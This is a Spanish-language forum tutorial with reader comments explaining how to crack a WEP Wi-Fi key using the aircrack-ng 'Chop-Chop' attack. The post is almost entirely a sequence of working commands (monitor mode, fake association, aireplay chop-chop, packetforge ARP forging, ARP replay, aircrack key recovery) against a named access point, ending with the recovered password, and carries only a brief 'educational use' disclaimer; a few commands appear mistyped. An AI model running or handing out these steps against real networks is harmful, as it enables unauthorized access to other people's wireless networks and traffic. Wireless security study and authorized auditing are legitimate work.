Ataque Chop-Chop a WEP

  • Categoría: Linux
  • Publicado hace más de 3 años
En este post les enseñare como romper un cifrado WEP

primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando

 
#iwconfig

 

 
Como podemos ver en la imagen anterior mi dispositvo se llama wlan0

lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor)

 
#airmon-ng stop wlan0

 

 
#airmon-ng start wlan0
 

 
Ahora localizamos el AP

 
#
airodump-ng wlan0


 

 

 
Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP

 
#
airodump-ng c 1 -w prueba -i wlan0

 

 

 
El siguiente paso es asociarnos contra el AP victima con el siguinte comando

 
#aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 wlan0

 

 
Ahora vamos a usar el ataque Chop-Chop

 
#aireplay-ng -4 -h 00:E0:4C:04:03:47 -b 00:0A:56:9A:18:FB wlan0

 

 

Despues presionamos la tecla ?y?




 

 

Ahora creamos una petición de paquete arp usando el archivo .xor:

 
#packetforge-ng -0 -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request






 

 

 

 


Ahora enviaremos el paquete ARP creado anteriormente

 
#aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0




 

 

 

 
En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contraseña

 

 

 

 


Ahora vamos a descifrar la contraseña con el siguiente comando

 
aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18:FB prueba-02*.ivs




 

 
Como podemos ver en la imagen anterrior tenemos la contraseña en tipo ASCII y la contraseña es WALDO

 
Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP.

Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.








Ataque Chop-Chop a WEP
30 Puntos Score: 7.5/10
Visitas: 2257 Favoritos: 7
Ver los usuarios que votaron...
38 Comentarios Ataque Chop-Chop a WEP
Le acabas de joder la infancia a un monton de gente  
@shaka33 no no lo es. solo ten paciensia
Cita alex12b: Mostrar

que si esta dificil
cual auditorias estas usando wifiway o beini ?
Disculpa las preguntas pero soy muy muy muy ... muy novato en esto.
Qu?
Cita alex12b: Mostrar

Pues porque ya te lo hacen autom?
sera queme servira esto con centos o ubuntu
@vandroiy veras es baltrack, si nunca lo as usado puedes buscar un tuto de como hacerlo en mi perfil anterior publique como hacerlo aqui te dejo el link del post http://www.identi.li/index.php?topic=154765 entra y checalo es facil. @shaka33 que no es dificil y punto
@alex12b
 ya te dige esta dificil
@shaka33 ya te dije que noo
pa que tanto rollo si beini hace la chamba
Cita shaka33: Mostrar


EPIC TROLLING.  LOGRO DESBLOQUEADO!  
@issue2b a ti tanbien te digo que esta dif?
voy a probarlo!
yeah, nunca supe como hacer el ataque chop-chop, solo capturar paquetes mediante asociacion, el ataque clasico. xD
Gracias
Cita: Mostrar
@kiove gracias por pasar. cuidate.
@ramen lo mejor es backtrak... y los que hacen pentesting enserio lo hacen "a mano" exeptuando algunas cosas creeme que funciona mejor hacerlo a mano que usar algun script/GUI para esto
@kiove   bien dicho hermano
@kiove por?


Ah, que tu has desactivado las guis totalmente y solo trabajas en linea de comandos..  
@issue2b no nada que ver.... pero trabajo desde las consolas y si tengo el "terminator" mejor, asi abro multiples terminales sobre 1 misma... y lo digo porque el aircrack es el aircrack y funciona en modo terminal... las demas son GUIs adaptadas para usar aircrack de manera grafica, pero te asueguro que de esa forma (de GUI/Scripts) no le sacas todo el provecho a aircrack... y para respetar el humor de la imagen.... asique:
@kiove Otro inutil que sigue viviendo en el Siglo XIX.
@kiove
"Dale un mono a un pobre y cenar?
@kiove No he puesto la fuente, porque es m?
GUAJAJAJAJAJAJAJAJAJAJAJAJAJAJAJAJAJAJA   ....Caos Caos....quiero mas caos
alguien sabria explicarme porque motivo estos programas me bajan tan pocos ivs?  
La verdad no se que pasa, cuando empiezo a enviar paquetes, el compu se bloquea llego a la mitad del proceso y no me jala que puede ser?? claro esta que lo hago con backtrack en un simulador  
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!